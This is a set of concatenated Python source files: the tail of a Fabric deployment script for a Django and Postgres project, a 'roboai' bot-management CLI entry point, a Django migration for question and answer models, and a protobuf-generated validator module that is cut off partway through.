"""
Installs one or more system packages via apt.
"""
return sudo("apt-get install -y -q " + packages)
@task
def pip(packages):
"""
Installs one or more Python packages within the virtual environment.
"""
with virtualenv():
return run("pip install %s" % packages)
def postgres(command):
"""
Runs the given command as the postgres user.
"""
show = not command.startswith("psql")
return sudo(command, show=show, user="postgres")
@task
def psql(sql, show=True):
"""
Runs SQL against the project's database.
"""
out = postgres('psql -c "%s"' % sql)
if show:
print_command(sql)
return out
@task
def backup(filename):
"""
Backs up the project database.
"""
tmp_file = "/tmp/%s" % filename
# We dump to /tmp because user "postgres" can't write to other user folders
# We cd to / because user "postgres" might not have read permissions
# elsewhere.
with cd("/"):
postgres("pg_dump -Fc %s > %s" % (env.proj_name, tmp_file))
run("cp %s ." % tmp_file)
sudo("rm -f %s" % tmp_file)
@task
def restore(filename):
"""
Restores the project database from a previous backup.
"""
return postgres("pg_restore -c -d %s %s" % (env.proj_name, filename))
@task
def python(code, show=True):
"""
Runs Python code in the project's virtual environment, with Django loaded.
"""
setup = "import os;" \
"os.environ[\'DJANGO_SETTINGS_MODULE\']=\'%s.settings\';" \
"import django;" \
"django.setup();" % env.proj_app
full_code = 'python -c "%s%s"' % (setup, code.replace("`", "\\\`"))
with project():
if show:
print_command(code)
result = run(full_code, show=False)
return result
def static():
"""
Returns the live STATIC_ROOT directory.
"""
return python("from django.conf import settings;"
"print(settings.STATIC_ROOT)", show=False).split("\n")[-1]
@task
def manage(command):
"""
Runs a Django management command.
"""
return run("%s %s" % (env.manage, command))
###########################
# Security best practices #
###########################
@task
@log_call
@hosts(["root@%s" % host for host in env.hosts])
def secure(new_user=env.user):
"""
Minimal security steps for brand new servers.
Installs system updates, creates new user (with sudo privileges) for future
usage, and disables root login via SSH.
"""
run("apt-get update -q")
run("apt-get upgrade -y -q")
run("adduser --gecos '' %s" % new_user)
run("usermod -G sudo %s" % new_user)
run("sed -i 's:RootLogin yes:RootLogin no:' /etc/ssh/sshd_config")
run("service ssh restart")
print(green("Security steps completed. Log in to the server as '%s' from "
"now on." % new_user, bold=True))
#########################
# Install and configure #
#########################
@task
@log_call
def install():
"""
Installs the base system and Python requirements for the entire server.
"""
# Install system requirements
sudo("apt-get update -y -q")
apt("nginx libjpeg-dev python-dev python-setuptools git-core "
"postgresql libpq-dev memcached supervisor python-pip")
run("mkdir -p /home/%s/logs" % env.user)
# Install Python requirements
sudo("pip install -U pip virtualenv virtualenvwrapper mercurial")
# Set up virtualenv
run("mkdir -p %s" % env.venv_home)
run("echo 'export WORKON_HOME=%s' >> /home/%s/.bashrc" % (env.venv_home,
env.user))
run("echo 'source /usr/local/bin/virtualenvwrapper.sh' >> "
"/home/%s/.bashrc" % env.user)
print(green("Successfully set up git, mercurial, pip, virtualenv, "
"supervisor, memcached.", bold=True))
@task
@log_call
def create():
"""
Creates the environment needed to host the project.
The environment consists of: system locales, virtualenv, database, project
files, SSL certificate, and project-specific Python requirements.
"""
# Generate project locale
locale = env.locale.replace("UTF-8", "utf8")
with hide("stdout"):
if locale not in run("locale -a"):
sudo("locale-gen %s" % env.locale)
sudo("update-locale %s" % env.locale)
sudo("service postgresql restart")
run("exit")
# Create project path
run("mkdir -p %s" % env.proj_path)
# Set up virtual env
run("mkdir -p %s" % env.venv_home)
with cd(env.venv_home):
if exists(env.proj_name):
if confirm("Virtualenv already exists in host server: %s"
"\nWould you like to replace it?" % env.proj_name):
run("rm -rf %s" % env.proj_name)
else:
abort()
run("virtualenv %s" % env.proj_name)
# Upload project files
if env.deploy_tool in env.vcs_tools:
vcs_upload()
else:
rsync_upload()
# Create DB and DB user
pw = db_pass()
user_sql_args = (env.proj_name, pw.replace("'", "\'"))
user_sql = "CREATE USER %s WITH ENCRYPTED PASSWORD '%s';" % user_sql_args
psql(user_sql, show=False)
shadowed = "*" * len(pw)
print_command(user_sql.replace("'%s'" % pw, "'%s'" % shadowed))
psql("CREATE DATABASE %s WITH OWNER %s ENCODING = 'UTF8' "
"LC_CTYPE = '%s' LC_COLLATE = '%s' TEMPLATE template0;" %
(env.proj_name, env.proj_name, env.locale, env.locale))
# Set up SSL certificate
if not env.ssl_disabled:
conf_path = "/etc/nginx/conf"
if not exists(conf_path):
sudo("mkdir %s" % conf_path)
with cd(conf_path):
crt_file = env.proj_name + ".crt"
key_file = env.proj_name + ".key"
if not exists(crt_file) and not exists(key_file):
try:
crt_local, = glob(join("deploy", "*.crt"))
key_local, = glob(join("deploy", "*.key"))
except ValueError:
parts = (crt_file, key_file, env.domains[0])
sudo("openssl req -new -x509 -nodes -out %s -keyout %s "
"-subj '/CN=%s' -days 3650" % parts)
else:
upload_template(crt_local, crt_file, use_sudo=True)
upload_template(key_local, key_file, use_sudo=True)
# Install project-specific requirements
upload_template_and_reload("settings")
with project():
if env.reqs_path:
pip("-r %s/%s" % (env.proj_path, env.reqs_path))
pip("gunicorn setproctitle psycopg2 "
"django-compressor python-memcached")
# Bootstrap the DB
manage("createdb --noinput --nodata")
python("from django.conf import settings;"
"from django.contrib.sites.models import Site;"
"Site.objects.filter(id=settings.SITE_ID).update(domain='%s');"
% env.domains[0])
for domain in env.domains:
python("from django.contrib.sites.models import Site;"
"Site.objects.get_or_create(domain='%s');" % domain)
if env.admin_pass:
pw = env.admin_pass
user_py = ("from django.contrib.auth import get_user_model;"
"User = get_user_model();"
"u, _ = User.objects.get_or_create(username='admin');"
"u.is_staff = u.is_superuser = True;"
"u.set_password('%s');"
"u.save();" % pw)
python(user_py, show=False)
shadowed = "*" * len(pw)
print_command(user_py.replace("'%s'" % pw, "'%s'" % shadowed))
return True
@task
@log_call
def remove():
"""
Blow away the current project.
"""
if exists(env.venv_path):
run("rm -rf %s" % env.venv_path)
if exists(env.proj_path):
run("rm -rf %s" % env.proj_path)
for template in get_templates().values():
remote_path = template["remote_path"]
if exists(remote_path):
sudo("rm %s" % remote_path)
if exists(env.repo_path):
run("rm -rf %s" % env.repo_path)
sudo("supervisorctl update")
psql("DROP DATABASE IF EXISTS %s;" % env.proj_name)
psql("DROP USER IF EXISTS %s;" % env.proj_name)
##############
# Deployment #
##############
@task
@log_call
def restart():
"""
Restart gunicorn worker processes for the project.
If the processes are not running, they will be started.
"""
pid_path = "%s/gunicorn.pid" % env.proj_path
if exists(pid_path):
run("kill -HUP `cat %s`" % pid_path)
else:
sudo("supervisorctl update")
@task
@log_call
def deploy():
"""
Deploy latest version of the project.
Backup current version of the project, push latest version of the project
via version control or rsync, install new requirements, sync and migrate
the database, collect any new static assets, and restart gunicorn's worker
processes for the project.
"""
if not exists(env.proj_path):
if confirm("Project does not exist in host server: %s"
"\nWould you like to create it?" % env.proj_name):
create()
else:
abort()
# Backup current version of the project
with cd(env.proj_path):
backup("last.db")
if env.deploy_tool in env.vcs_tools:
with cd(env.repo_path):
if env.deploy_tool == "git":
run("git rev-parse HEAD > %s/last.commit" % env.proj_path)
elif env.deploy_tool == "hg":
run("hg id -i > last.commit")
with project():
static_dir = static()
if exists(static_dir):
run("tar -cf static.tar --exclude='*.thumbnails' %s" %
static_dir)
else:
with cd(join(env.proj_path, "..")):
excludes = ["*.pyc", "*.pio", "*.thumbnails"]
exclude_arg = " ".join("--exclude='%s'" % e for e in excludes)
run("tar -cf {0}.tar {1} {0}".format(env.proj_name, exclude_arg))
# Deploy latest version of the project
with update_changed_requirements():
if env.deploy_tool in env.vcs_tools:
vcs_upload()
else:
rsync_upload()
with project():
manage("collectstatic -v 0 --noinput")
manage("syncdb --noinput")
manage("migrate --noinput")
for name in get_templates():
upload_template_and_reload(name)
restart()
return True
@task
@log_call
def rollback():
"""
Reverts project state to the last deploy.
When a deploy is performed, the current state of the project is
backed up. This includes the project files, the database, and all static
files. Calling rollback will revert all of these to their state prior to
the last deploy.
"""
with update_changed_requirements():
if env.deploy_tool in env.vcs_tools:
with cd(env.repo_path):
if env.deploy_tool == "git":
run("GIT_WORK_TREE={0} git checkout -f "
"`cat {0}/last.commit`".format(env.proj_path))
elif env.deploy_tool == "hg":
run("hg update -C `cat last.commit`")
with project():
with cd(join(static(), "..")):
run("tar -xf %s/static.tar" % env.proj_path)
else:
with cd(env.proj_path.rsplit("/", 1)[0]):
run("rm -rf %s" % env.proj_name)
run("tar -xf %s.tar" % env.proj_name)
with cd(env.proj_path):
restore("last.db")
restart()
@task
@log_call
def all():
"""
Installs everything required on a new system and deploy.
From the base software, up to the deployed project.
"""
install()
if create():
deploy()
|
py | b4103a2e41c1b957ad79f8df7c9c3eeeb2f7f162 | import click
from roboai_cli.commands import (
login,
logout,
connect,
deploy,
remove,
stop,
start,
seed,
status,
environment,
package,
clean,
logs,
diff,
train,
run,
shell,
test,
interactive,
stories
)
from pyfiglet import Figlet
from roboai_cli.__init__ import __version__ # this is wrong but won't work otherwise
from roboai_cli.util.cli import print_message
from roboai_cli.util.text import remove_last_line
@click.group(help=f"roboai {__version__}")
@click.version_option(version=__version__, message=f"roboai {__version__}")
def cli():
pass
cli.add_command(login.command)
cli.add_command(logout.command)
cli.add_command(connect.command)
cli.add_command(deploy.command)
cli.add_command(remove.command)
cli.add_command(stop.command)
cli.add_command(start.command)
cli.add_command(seed.command)
cli.add_command(status.command)
cli.add_command(environment.command)
cli.add_command(package.command)
cli.add_command(clean.command)
cli.add_command(logs.command)
cli.add_command(diff.command)
cli.add_command(train.command)
cli.add_command(run.command)
cli.add_command(shell.command)
cli.add_command(stories.command)
cli.add_command(test.command)
cli.add_command(interactive.command)
try:
import colorama
colorama.init()
except any:
pass
def get_motd():
figlet = Figlet(font="standard")
logo = figlet.renderText("ROBO . AI")
logo = remove_last_line(remove_last_line(logo))
logo += "\nBot Management Tool robo-ai.com\n"
return logo
def run():
print_message(get_motd())
cli()
if __name__ == "__main__":
run()
|
py | b4103d1a9faf8c637e6e95c0e5ef5132b507c36f | # -*- coding: utf-8 -*-
# Generated by Django 1.11 on 2018-07-23 18:01
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Answer',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('AnswerTitle', models.TextField()),
('AnsweredAt', models.DateTimeField(auto_now=True)),
],
),
migrations.CreateModel(
name='Question',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('QuestionTitle', models.TextField()),
('AskedAt', models.DateTimeField(auto_now=True)),
('IsAnswered', models.BooleanField(default=False)),
('QueriedBy', models.CharField(default=None, max_length=100)),
('CreatedFor', models.ForeignKey(default=None, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.AddField(
model_name='answer',
name='Question',
field=models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to='query.Question'),
),
]
|
py | b4103d3058c56d8ad940b9129a0bcffa7238e37e | # -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: proto/validator.proto
"""Generated protocol buffer code."""
from google.protobuf import descriptor as _descriptor
from google.protobuf import descriptor_pool as _descriptor_pool
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from google.protobuf import descriptor_pb2 as google_dot_protobuf_dot_descriptor__pb2
DESCRIPTOR = _descriptor_pool.Default().AddSerializedFile(b'\n\x15proto/validator.proto\x12\tvalidator\x1a google/protobuf/descriptor.proto\"Y\n\x0cValidOptions\x12$\n\x08\x63heck_if\x18\x01 \x01(\x0b\x32\x12.validator.CheckIf\x12#\n\x04tags\x18\x02 \x01(\x0b\x32\x15.validator.TagOptions\"=\n\x07\x43heckIf\x12\r\n\x05\x66ield\x18\x01 \x01(\t\x12#\n\x04tags\x18\x02 \x01(\x0b\x32\x15.validator.TagOptions\"\xbf\x03\n\nTagOptions\x12%\n\x05oneof\x18\x14 \x01(\x0b\x32\x14.validator.OneOfTagsH\x00\x12%\n\x05\x66loat\x18\x15 \x01(\x0b\x32\x14.validator.FloatTagsH\x00\x12!\n\x03int\x18\x16 \x01(\x0b\x32\x12.validator.IntTagsH\x00\x12#\n\x04uint\x18\x17 \x01(\x0b\x32\x13.validator.UintTagsH\x00\x12\'\n\x06string\x18\x18 \x01(\x0b\x32\x15.validator.StringTagsH\x00\x12%\n\x05\x62ytes\x18\x19 \x01(\x0b\x32\x14.validator.BytesTagsH\x00\x12#\n\x04\x62ool\x18\x1a \x01(\x0b\x32\x13.validator.BoolTagsH\x00\x12#\n\x04\x65num\x18\x1b \x01(\x0b\x32\x13.validator.EnumTagsH\x00\x12)\n\x07message\x18\x1c \x01(\x0b\x32\x16.validator.MessageTagsH\x00\x12+\n\x08repeated\x18\x1d \x01(\x0b\x32\x17.validator.RepeatedTagsH\x00\x12!\n\x03map\x18\x1e \x01(\x0b\x32\x12.validator.MapTagsH\x00\x42\x06\n\x04kind\"/\n\tOneOfTags\x12\x15\n\x08not_null\x18\x01 \x01(\x08H\x00\x88\x01\x01\x42\x0b\n\t_not_null\"\xbb\x01\n\tFloatTags\x12\x0f\n\x02\x65q\x18\x03 \x01(\x01H\x00\x88\x01\x01\x12\x0f\n\x02ne\x18\x04 \x01(\x01H\x01\x88\x01\x01\x12\x0f\n\x02lt\x18\x05 \x01(\x01H\x02\x88\x01\x01\x12\x0f\n\x02gt\x18\x06 \x01(\x01H\x03\x88\x01\x01\x12\x10\n\x03lte\x18\x07 \x01(\x01H\x04\x88\x01\x01\x12\x10\n\x03gte\x18\x08 \x01(\x01H\x05\x88\x01\x01\x12\n\n\x02in\x18\t \x03(\x01\x12\x0e\n\x06not_in\x18\n \x03(\x01\x42\x05\n\x03_eqB\x05\n\x03_neB\x05\n\x03_ltB\x05\n\x03_gtB\x06\n\x04_lteB\x06\n\x04_gte\"\xb9\x01\n\x07IntTags\x12\x0f\n\x02\x65q\x18\x03 \x01(\x03H\x00\x88\x01\x01\x12\x0f\n\x02ne\x18\x04 \x01(\x03H\x01\x88\x01\x01\x12\x0f\n\x02lt\x18\x05 \x01(\x03H\x02\x88\x01\x01\x12\x0f\n\x02gt\x18\x06 \x01(\x03H\x03\x88\x01\x01\x12\x10\n\x03lte\x18\x07 \x01(\x03H\x04\x88\x01\x01\x12\x10\n\x03gte\x18\x08 \x01(\x03H\x05\x88\x01\x01\x12\n\n\x02in\x18\t \x03(\x03\x12\x0e\n\x06not_in\x18\n \x03(\x03\x42\x05\n\x03_eqB\x05\n\x03_neB\x05\n\x03_ltB\x05\n\x03_gtB\x06\n\x04_lteB\x06\n\x04_gte\"\xba\x01\n\x08UintTags\x12\x0f\n\x02\x65q\x18\x03 \x01(\x04H\x00\x88\x01\x01\x12\x0f\n\x02ne\x18\x04 \x01(\x04H\x01\x88\x01\x01\x12\x0f\n\x02lt\x18\x05 \x01(\x04H\x02\x88\x01\x01\x12\x0f\n\x02gt\x18\x06 \x01(\x04H\x03\x88\x01\x01\x12\x10\n\x03lte\x18\x07 \x01(\x04H\x04\x88\x01\x01\x12\x10\n\x03gte\x18\x08 \x01(\x04H\x05\x88\x01\x01\x12\n\n\x02in\x18\t \x03(\x04\x12\x0e\n\x06not_in\x18\n \x03(\x04\x42\x05\n\x03_eqB\x05\n\x03_neB\x05\n\x03_ltB\x05\n\x03_gtB\x06\n\x04_lteB\x06\n\x04_gte\"\xcb\x15\n\nStringTags\x12\x0f\n\x02\x65q\x18\x03 \x01(\tH\x00\x88\x01\x01\x12\x0f\n\x02ne\x18\x04 \x01(\tH\x01\x88\x01\x01\x12\x0f\n\x02lt\x18\x05 \x01(\tH\x02\x88\x01\x01\x12\x0f\n\x02gt\x18\x06 \x01(\tH\x03\x88\x01\x01\x12\x10\n\x03lte\x18\x07 \x01(\tH\x04\x88\x01\x01\x12\x10\n\x03gte\x18\x08 \x01(\tH\x05\x88\x01\x01\x12\n\n\x02in\x18\t \x03(\t\x12\x0e\n\x06not_in\x18\n \x03(\t\x12\x18\n\x0b\x63har_len_eq\x18\x14 \x01(\x03H\x06\x88\x01\x01\x12\x18\n\x0b\x63har_len_ne\x18\x15 \x01(\x03H\x07\x88\x01\x01\x12\x18\n\x0b\x63har_len_gt\x18\x16 \x01(\x03H\x08\x88\x01\x01\x12\x18\n\x0b\x63har_len_lt\x18\x17 \x01(\x03H\t\x88\x01\x01\x12\x19\n\x0c\x63har_len_gte\x18\x18 \x01(\x03H\n\x88\x01\x01\x12\x19\n\x0c\x63har_len_lte\x18\x19 \x01(\x03H\x0b\x88\x01\x01\x12\x18\n\x0b\x62yte_len_eq\x18\x1e \x01(\x03H\x0c\x88\x01\x01\x12\x18\n\x0b\x62yte_len_ne\x18\x1f \x01(\x03H\r\x88\x01\x01\x12\x18\n\x0b\x62yte_len_gt\x18 \x01(\x03H\x0e\x88\x01\x01\x12\x18\n\x0b\x62yte_len_lt\x18! \x01(\x03H\x0f\x88\x01\x01\x12\x19\n\x0c\x62yte_len_gte\x18\" \x01(\x03H\x10\x88\x01\x01\x12\x19\n\x0c\x62yte_len_lte\x18# \x01(\x03H\x11\x88\x01\x01\x12\x12\n\x05regex\x18( \x01(\tH\x12\x88\x01\x01\x12\x13\n\x06prefix\x18) \x01(\tH\x13\x88\x01\x01\x12\x16\n\tno_prefix\x18* \x01(\tH\x14\x88\x01\x01\x12\x13\n\x06suffix\x18+ \x01(\tH\x15\x88\x01\x01\x12\x16\n\tno_suffix\x18, \x01(\tH\x16\x88\x01\x01\x12\x15\n\x08\x63ontains\x18- \x01(\tH\x17\x88\x01\x01\x12\x19\n\x0cnot_contains\x18. \x01(\tH\x18\x88\x01\x01\x12\x19\n\x0c\x63ontains_any\x18/ \x01(\tH\x19\x88\x01\x01\x12\x1d\n\x10not_contains_any\x18\x30 \x01(\tH\x1a\x88\x01\x01\x12\x11\n\x04utf8\x18Q \x01(\x08H\x1b\x88\x01\x01\x12\x12\n\x05\x61scii\x18G \x01(\x08H\x1c\x88\x01\x01\x12\x18\n\x0bprint_ascii\x18H \x01(\x08H\x1d\x88\x01\x01\x12\x14\n\x07\x62oolean\x18I \x01(\x08H\x1e\x88\x01\x01\x12\x16\n\tlowercase\x18J \x01(\x08H\x1f\x88\x01\x01\x12\x16\n\tuppercase\x18K \x01(\x08H \x88\x01\x01\x12\x12\n\x05\x61lpha\x18L \x01(\x08H!\x88\x01\x01\x12\x13\n\x06number\x18M \x01(\x08H\"\x88\x01\x01\x12\x19\n\x0c\x61lpha_number\x18N \x01(\x08H#\x88\x01\x01\x12\x0f\n\x02ip\x18\x65 \x01(\x08H$\x88\x01\x01\x12\x11\n\x04ipv4\x18\x66 \x01(\x08H%\x88\x01\x01\x12\x11\n\x04ipv6\x18g \x01(\x08H&\x88\x01\x01\x12\x14\n\x07ip_addr\x18h \x01(\x08H\'\x88\x01\x01\x12\x15\n\x08ip4_addr\x18i \x01(\x08H(\x88\x01\x01\x12\x15\n\x08ip6_addr\x18j \x01(\x08H)\x88\x01\x01\x12\x11\n\x04\x63idr\x18k \x01(\x08H*\x88\x01\x01\x12\x13\n\x06\x63idrv4\x18l \x01(\x08H+\x88\x01\x01\x12\x13\n\x06\x63idrv6\x18m \x01(\x08H,\x88\x01\x01\x12\x15\n\x08tcp_addr\x18o \x01(\x08H-\x88\x01\x01\x12\x16\n\ttcp4_addr\x18p \x01(\x08H.\x88\x01\x01\x12\x16\n\ttcp6_addr\x18q \x01(\x08H/\x88\x01\x01\x12\x15\n\x08udp_addr\x18r \x01(\x08H0\x88\x01\x01\x12\x16\n\tudp4_addr\x18s \x01(\x08H1\x88\x01\x01\x12\x16\n\tudp6_addr\x18t \x01(\x08H2\x88\x01\x01\x12\x10\n\x03mac\x18n \x01(\x08H3\x88\x01\x01\x12\x16\n\tunix_addr\x18u \x01(\x08H4\x88\x01\x01\x12\x15\n\x08hostname\x18v \x01(\x08H5\x88\x01\x01\x12\x1d\n\x10hostname_rfc1123\x18w \x01(\x08H6\x88\x01\x01\x12\x1a\n\rhostname_port\x18x \x01(\x08H7\x88\x01\x01\x12\x15\n\x08\x64\x61ta_uri\x18y \x01(\x08H8\x88\x01\x01\x12\x11\n\x04\x66qdn\x18z \x01(\x08H9\x88\x01\x01\x12\x10\n\x03uri\x18{ \x01(\x08H:\x88\x01\x01\x12\x10\n\x03url\x18| \x01(\x08H;\x88\x01\x01\x12\x18\n\x0burl_encoded\x18} \x01(\x08H<\x88\x01\x01\x12\x16\n\tunix_cron\x18P \x01(\x08H=\x88\x01\x01\x12\x13\n\x05\x65mail\x18\x8c\x01 \x01(\x08H>\x88\x01\x01\x12\x12\n\x04json\x18\x8d\x01 \x01(\x08H?\x88\x01\x01\x12\x11\n\x03jwt\x18\x8e\x01 \x01(\x08H@\x88\x01\x01\x12\x12\n\x04html\x18\x8f\x01 \x01(\x08HA\x88\x01\x01\x12\x1a\n\x0chtml_encoded\x18\x90\x01 \x01(\x08HB\x88\x01\x01\x12\x14\n\x06\x62\x61se64\x18\x91\x01 \x01(\x08HC\x88\x01\x01\x12\x18\n\nbase64_url\x18\x92\x01 \x01(\x08HD\x88\x01\x01\x12\x19\n\x0bhexadecimal\x18\x93\x01 \x01(\x08HE\x88\x01\x01\x12\x16\n\x08\x64\x61tetime\x18\x94\x01 \x01(\tHF\x88\x01\x01\x12\x16\n\x08timezone\x18\x95\x01 \x01(\x08HG\x88\x01\x01\x12\x12\n\x04uuid\x18\x96\x01 \x01(\x08HH\x88\x01\x01\x12\x13\n\x05uuid1\x18\x97\x01 \x01(\x08HI\x88\x01\x01\x12\x13\n\x05uuid3\x18\x98\x01 \x01(\x08HJ\x88\x01\x01\x12\x13\n\x05uuid4\x18\x99\x01 \x01(\x08HK\x88\x01\x01\x12\x13\n\x05uuid5\x18\x9a\x01 \x01(\x08HL\x88\x01\x01\x42\x05\n\x03_eqB\x05\n\x03_neB\x05\n\x03_ltB\x05\n\x03_gtB\x06\n\x04_lteB\x06\n\x04_gteB\x0e\n\x0c_char_len_eqB\x0e\n\x0c_char_len_neB\x0e\n\x0c_char_len_gtB\x0e\n\x0c_char_len_ltB\x0f\n\r_char_len_gteB\x0f\n\r_char_len_lteB\x0e\n\x0c_byte_len_eqB\x0e\n\x0c_byte_len_neB\x0e\n\x0c_byte_len_gtB\x0e\n\x0c_byte_len_ltB\x0f\n\r_byte_len_gteB\x0f\n\r_byte_len_lteB\x08\n\x06_regexB\t\n\x07_prefixB\x0c\n\n_no_prefixB\t\n\x07_suffixB\x0c\n\n_no_suffixB\x0b\n\t_containsB\x0f\n\r_not_containsB\x0f\n\r_contains_anyB\x13\n\x11_not_contains_anyB\x07\n\x05_utf8B\x08\n\x06_asciiB\x0e\n\x0c_print_asciiB\n\n\x08_booleanB\x0c\n\n_lowercaseB\x0c\n\n_uppercaseB\x08\n\x06_alphaB\t\n\x07_numberB\x0f\n\r_alpha_numberB\x05\n\x03_ipB\x07\n\x05_ipv4B\x07\n\x05_ipv6B\n\n\x08_ip_addrB\x0b\n\t_ip4_addrB\x0b\n\t_ip6_addrB\x07\n\x05_cidrB\t\n\x07_cidrv4B\t\n\x07_cidrv6B\x0b\n\t_tcp_addrB\x0c\n\n_tcp4_addrB\x0c\n\n_tcp6_addrB\x0b\n\t_udp_addrB\x0c\n\n_udp4_addrB\x0c\n\n_udp6_addrB\x06\n\x04_macB\x0c\n\n_unix_addrB\x0b\n\t_hostnameB\x13\n\x11_hostname_rfc1123B\x10\n\x0e_hostname_portB\x0b\n\t_data_uriB\x07\n\x05_fqdnB\x06\n\x04_uriB\x06\n\x04_urlB\x0e\n\x0c_url_encodedB\x0c\n\n_unix_cronB\x08\n\x06_emailB\x07\n\x05_jsonB\x06\n\x04_jwtB\x07\n\x05_htmlB\x0f\n\r_html_encodedB\t\n\x07_base64B\r\n\x0b_base64_urlB\x0e\n\x0c_hexadecimalB\x0b\n\t_datetimeB\x0b\n\t_timezoneB\x07\n\x05_uuidB\x08\n\x06_uuid1B\x08\n\x06_uuid3B\x08\n\x06_uuid4B\x08\n\x06_uuid5\"\xcf\x01\n\tBytesTags\x12\x13\n\x06len_eq\x18\x03 \x01(\x03H\x00\x88\x01\x01\x12\x13\n\x06len_ne\x18\x04 \x01(\x03H\x01\x88\x01\x01\x12\x13\n\x06len_lt\x18\x05 \x01(\x03H\x02\x88\x01\x01\x12\x13\n\x06len_gt\x18\x06 \x01(\x03H\x03\x88\x01\x01\x12\x14\n\x07len_lte\x18\x07 \x01(\x03H\x04\x88\x01\x01\x12\x14\n\x07len_gte\x18\x08 \x01(\x03H\x05\x88\x01\x01\x42\t\n\x07_len_eqB\t\n\x07_len_neB\t\n\x07_len_ltB\t\n\x07_len_gtB\n\n\x08_len_lteB\n\n\x08_len_gte\"\"\n\x08\x42oolTags\x12\x0f\n\x02\x65q\x18\x03 \x01(\x08H\x00\x88\x01\x01\x42\x05\n\x03_eq\"\xde\x01\n\x08\x45numTags\x12\x0f\n\x02\x65q\x18\x03 \x01(\x05H\x00\x88\x01\x01\x12\x0f\n\x02ne\x18\x04 \x01(\x05H\x01\x88\x01\x01\x12\x0f\n\x02lt\x18\x05 \x01(\x05H\x02\x88\x01\x01\x12\x0f\n\x02gt\x18\x06 \x01(\x05H\x03\x88\x01\x01\x12\x10\n\x03lte\x18\x07 \x01(\x05H\x04\x88\x01\x01\x12\x10\n\x03gte\x18\x08 \x01(\x05H\x05\x88\x01\x01\x12\n\n\x02in\x18\t \x03(\x05\x12\x0e\n\x06not_in\x18\n \x03(\x05\x12\x15\n\x08in_enums\x18\x0b \x01(\x08H\x06\x88\x01\x01\x42\x05\n\x03_eqB\x05\n\x03_neB\x05\n\x03_ltB\x05\n\x03_gtB\x06\n\x04_lteB\x06\n\x04_gteB\x0b\n\t_in_enums\"M\n\x0bMessageTags\x12\x15\n\x08not_null\x18\x02 \x01(\x08H\x00\x88\x01\x01\x12\x11\n\x04skip\x18\x03 \x01(\x08H\x01\x88\x01\x01\x42\x0b\n\t_not_nullB\x07\n\x05_skip\"\xbb\x02\n\x0cRepeatedTags\x12\x15\n\x08not_null\x18\x02 \x01(\x08H\x00\x88\x01\x01\x12\x13\n\x06len_eq\x18\x03 \x01(\x03H\x01\x88\x01\x01\x12\x13\n\x06len_ne\x18\x04 \x01(\x03H\x02\x88\x01\x01\x12\x13\n\x06len_lt\x18\x05 \x01(\x03H\x03\x88\x01\x01\x12\x13\n\x06len_gt\x18\x06 \x01(\x03H\x04\x88\x01\x01\x12\x14\n\x07len_lte\x18\x07 \x01(\x03H\x05\x88\x01\x01\x12\x14\n\x07len_gte\x18\x08 \x01(\x03H\x06\x88\x01\x01\x12\x13\n\x06unique\x18\n \x01(\x08H\x07\x88\x01\x01\x12#\n\x04item\x18\x0b \x01(\x0b\x32\x15.validator.TagOptionsB\x0b\n\t_not_nullB\t\n\x07_len_eqB\t\n\x07_len_neB\t\n\x07_len_ltB\t\n\x07_len_gtB\n\n\x08_len_lteB\n\n\x08_len_gteB\t\n\x07_unique\"\xbb\x02\n\x07MapTags\x12\x15\n\x08not_null\x18\x02 \x01(\x08H\x00\x88\x01\x01\x12\x13\n\x06len_eq\x18\x03 \x01(\x03H\x01\x88\x01\x01\x12\x13\n\x06len_ne\x18\x04 \x01(\x03H\x02\x88\x01\x01\x12\x13\n\x06len_lt\x18\x05 \x01(\x03H\x03\x88\x01\x01\x12\x13\n\x06len_gt\x18\x06 \x01(\x03H\x04\x88\x01\x01\x12\x14\n\x07len_lte\x18\x07 \x01(\x03H\x05\x88\x01\x01\x12\x14\n\x07len_gte\x18\x08 \x01(\x03H\x06\x88\x01\x01\x12\"\n\x03key\x18\x0b \x01(\x0b\x32\x15.validator.TagOptions\x12$\n\x05value\x18\x0c \x01(\x0b\x32\x15.validator.TagOptionsB\x0b\n\t_not_nullB\t\n\x07_len_eqB\t\n\x07_len_neB\t\n\x07_len_ltB\t\n\x07_len_gtB\n\n\x08_len_lteB\n\n\x08_len_gte:G\n\x05\x66ield\x12\x1d.google.protobuf.FieldOptions\x18\xfc\xfb\x03 \x01(\x0b\x32\x17.validator.ValidOptions:G\n\x05oneof\x12\x1d.google.protobuf.OneofOptions\x18\x87\xfc\x03 \x01(\x0b\x32\x17.validator.ValidOptionsBg\n$io.github.yu31.protoc.pb.pbvalidatorB\x0bPBValidatorP\x00Z0github.com/yu31/protoc-plugin/xgo/pb/pbvalidatorb\x06proto3')
FIELD_FIELD_NUMBER = 65020
field = DESCRIPTOR.extensions_by_name['field']
ONEOF_FIELD_NUMBER = 65031
oneof = DESCRIPTOR.extensions_by_name['oneof']
_VALIDOPTIONS = DESCRIPTOR.message_types_by_name['ValidOptions']
_CHECKIF = DESCRIPTOR.message_types_by_name['CheckIf']
_TAGOPTIONS = DESCRIPTOR.message_types_by_name['TagOptions']
_ONEOFTAGS = DESCRIPTOR.message_types_by_name['OneOfTags']
_FLOATTAGS = DESCRIPTOR.message_types_by_name['FloatTags']
_INTTAGS = DESCRIPTOR.message_types_by_name['IntTags']
_UINTTAGS = DESCRIPTOR.message_types_by_name['UintTags']
_STRINGTAGS = DESCRIPTOR.message_types_by_name['StringTags']
_BYTESTAGS = DESCRIPTOR.message_types_by_name['BytesTags']
_BOOLTAGS = DESCRIPTOR.message_types_by_name['BoolTags']
_ENUMTAGS = DESCRIPTOR.message_types_by_name['EnumTags']
_MESSAGETAGS = DESCRIPTOR.message_types_by_name['MessageTags']
_REPEATEDTAGS = DESCRIPTOR.message_types_by_name['RepeatedTags']
_MAPTAGS = DESCRIPTOR.message_types_by_name['MapTags']
ValidOptions = _reflection.GeneratedProtocolMessageType('ValidOptions', (_message.Message,), {
